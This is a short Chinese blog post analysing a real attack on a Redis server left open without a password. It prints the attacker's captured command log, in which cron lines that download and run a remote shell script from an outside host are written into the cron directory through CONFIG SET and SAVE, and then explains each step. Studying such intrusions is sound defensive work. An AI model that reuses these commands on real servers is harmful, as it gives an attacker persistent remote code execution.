zoukankan      html  css  js  c++  java
  • [日常] 研究redis未授权访问漏洞利用过程

    前提:redis允许远程连接,不需要密码

    1522057495.583846 [0 123.206.24.121:50084] "set" "dUHkp" "
    
    */1 * * * * curl cdn.namunil.com/sh.php|sh
    "
    1522057495.584467 [0 123.206.24.121:50084] "set" "yA" "
    
    */2 * * * * wget -O- cdn.namunil.com/sh.php|sh
    "
    1522057495.585023 [0 123.206.24.121:50084] "set" "HoemuOP" "
    
    */3 * * * * /usr/bin/curl -qs cdn.namunil.com/sh.php|/bin/sh
    "
    1522057495.585650 [0 123.206.24.121:50084] "set" "ehWap" "
    
    */4 * * * * /usr/bin/wget -q -O- cdn.namunil.com/sh.php|/bin/sh
    "
    1522057495.586313 [0 123.206.24.121:50084] "config" "set" "dir" "/var/spool/cron/"
    1522057495.587036 [0 123.206.24.121:50084] "config" "set" "dbfilename" "root"
    1522057495.587374 [0 123.206.24.121:50084] "save"
    1522057495.587827 [0 123.206.24.121:50084] "config" "set" "dir" "/var/spool/cron/crontabs/"
    1522057495.588235 [0 123.206.24.121:50084] "save"
    

    1.执行set命令,保存字符串,value 是一条cron规则的形式
    2.设置备份文件的目录到cron目录
    3.设置备份文件的文件名成root
    4.save保存文件,直接把字符串中的cron规则写入了文件
    5.cron定时执行,远程脚本里面各种操作

      

  • 相关阅读:
    K优先队列——对顶堆(两种优先队列的组合)
    斐波那契数列——UPC
    UPC-混合训练第十五场
    隐写术之steghide的使用
    常见的文件头文件尾
    隐写术
    1.6 创建新的虚拟机以及如何开启虚拟机
    1.5 下载和安装VMWare
    1.4 常见的网络协议
    1.3 Windows注册表
  • 原文地址:https://www.cnblogs.com/taoshihan/p/8658866.html
Copyright © 2011-2022 走看看